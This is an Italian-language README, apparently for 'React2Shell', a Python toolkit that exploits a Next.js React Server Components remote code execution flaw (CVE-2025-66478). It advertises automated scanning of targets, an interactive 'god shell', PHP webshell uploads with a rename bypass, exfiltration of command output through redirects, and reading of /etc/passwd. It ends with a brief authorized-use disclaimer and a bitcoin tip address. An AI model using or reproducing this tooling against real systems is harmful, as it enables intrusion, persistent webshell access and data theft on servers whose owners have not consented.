
React2Shell - CVE-2025-66478 RCE Exploit
Questo toolkit Python sfrutta l'inquinamento dei prototipi dei React Server Components (RSC) di Next.js + la catena di gadget React.lazy(-1) per accesso RCE completo, inclusi shell interattivo "god shell", upload di file (dropper di webshell PHP) ed esfiltrazione tramite ?out=.

Rilevamento e sfruttamento automatico di applicazioni Next.js vulnerabili (es. target.com). Rilascia shell con uid=33(www-data) e:
child_process.execSync → /exploit?out=UIDread /etc/passwd), upload{\"0\":null} → 500 E{\"digest conferma gestore RSC.Location: /exploit?out=id_outputexecSync(cmd) → esfiltra stdout/stderr tramite redirect.upload_txt local.txt remote.php → bypass scrittura+rinomina.pip3 install aiohttppython3 main.pyhttp://target.com o targets.txt1=Rilevamento 2=PoC(id) 3=Personalizzato 4=God Shell [4]Piped: echo \"http://target\n4\" | python3 main.py
Comandi God Shell:
upload <local.php> <remote/shell.php> # Direct PHP upload
upload_txt <local> <remote/shell.php> # TXT→rename bypass
upload_bin <local> <remote> # Binaries (chmod later)
help / exit
id / cat /etc/passwd / ls -la /var/www/
React2Shell_Owned/pwned_YYYYMMDD_HHMMSS.txt[VULNERABILE] → uid=33(www-data)aiohttp
pip install aiohttp
Solo per test di penetrazione autorizzati e scopi educativi (l'utente ha confermato il permesso ai sensi dei ToS). L'uso non autorizzato è illegale/non etico.
Offrimi un caffè:
₿ BTC: 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh
©2025 khadafigans